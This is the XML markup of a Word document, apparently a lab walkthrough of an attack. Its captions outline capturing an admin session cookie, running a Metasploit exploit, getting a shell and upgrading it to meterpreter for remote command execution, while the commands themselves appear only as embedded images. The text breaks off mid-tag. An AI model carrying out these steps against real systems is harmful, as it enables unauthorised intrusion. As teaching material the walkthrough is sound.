    <w:p w14:paraId="7A0A1F90" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7169CBD3" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="112973FD" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5FB501D8" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="02BD48E1" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="32A19085" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7B31FB4F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AED480B" wp14:editId="681E74F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>254939</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="749685"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2007569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569778" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="749685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:t>The admin session cookie value is recorded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782F0FF" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1105E845" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="30578B20" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="056444AD" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="72AB52BF" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3192688B" w14:textId="2450BE95" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E11A26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="509E0FF7" wp14:editId="3DD69DC0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4878959" cy="4349363"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1490770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770026" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4878959" cy="4349363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Launch Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C15969" w14:textId="5DA1D40C" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0C9004D6" w14:textId="15CD1479" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0C164A9B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4E38CD03" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="741DC879" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="35A0C8BD" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7441BB05" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="18B0B025" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4D6242B3" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4DA59CE7" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="65811585" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="242373B9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7F1B42F7" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="475810C5" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3E415B6A" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4022994C" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="16CEF1D6" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1E6F467C" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="624AEC8E" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRPr="00E11A26" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="53E4F7DD" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00E11A26" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1205B620" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="00289F21" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="316D5CA0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4B874356" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1F2F20F9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Use the below exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10A50E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00A6437A" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="005E08F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12D2F05A" wp14:editId="18B86E53">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6681</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5048955" cy="704948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1949121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121313" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048955" cy="704948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98F78F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5396BA7C" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="513E379D" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRPr="009D47D0" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7A5DEAF5" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009D47D0" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="000BBA2F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set the required information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2563E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00A40797" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="00A40797">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67FE5B3E" wp14:editId="042E7476">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8586</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4945711" cy="946136"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="1839893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893928" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4945711" cy="946136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E37911" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4CA861E8" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="72C0EE39" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6349C915" w14:textId="08AC26EF" w:rsidR="00D14C96" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="36CE4DBD" w14:textId="1AD9FA43" w:rsidR="00D14C96" w:rsidRPr="0034224E" w:rsidRDefault="00D14C96" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6E8004F4" w14:textId="7E2AE60F" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Got access to shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404AF568" w14:textId="67F00634" w:rsidR="00FC71AB" w:rsidRPr="007309E5" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="007309E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13D1E0E3" wp14:editId="0683C87E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5295569" cy="1528700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1124124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124355" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295569" cy="1528700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B57EDC" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00FE384C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4BD07CDC" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00FE384C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1852F3F1" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="470CA391" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="534A345B" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5E69ABDE" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRPr="00FE384C" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="41652D3B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00FE384C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6185119D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00FE384C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4901A46D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009411FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D28C277" wp14:editId="1DC263A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286716</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="2866445"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="900202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02573" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="2866445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Background the session and upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DD51E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="30B5D2D7" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4A664E02" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="51CB7CA4" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="06797839" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7D05D19C" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="634742A2" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3FD42F85" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0143B572" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="65051250" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="21B28EE2" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1F925F51" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="625892ED" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRPr="009411FA" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4A2FE605" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="009411FA" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2A982C74" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2AEE216E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0C8530C9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6CAD4EDB" w14:textId="14A546E0" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Start session 2 and you will get meterpreter access. You now have remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB71E78" w14:textId="17899852" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="00200480">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ACE8737" wp14:editId="503DC792">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4334480" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="411343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343374" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4334480" cy="714475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18C5A0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="33C8DAEE" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="43A29FED" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="73663715" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRPr="005C315A" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="34625169" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3AD9EB28" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00004322">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="619429A6" wp14:editId="5FA2A90E">
            <wp:simplePos x="0" y="0"/>
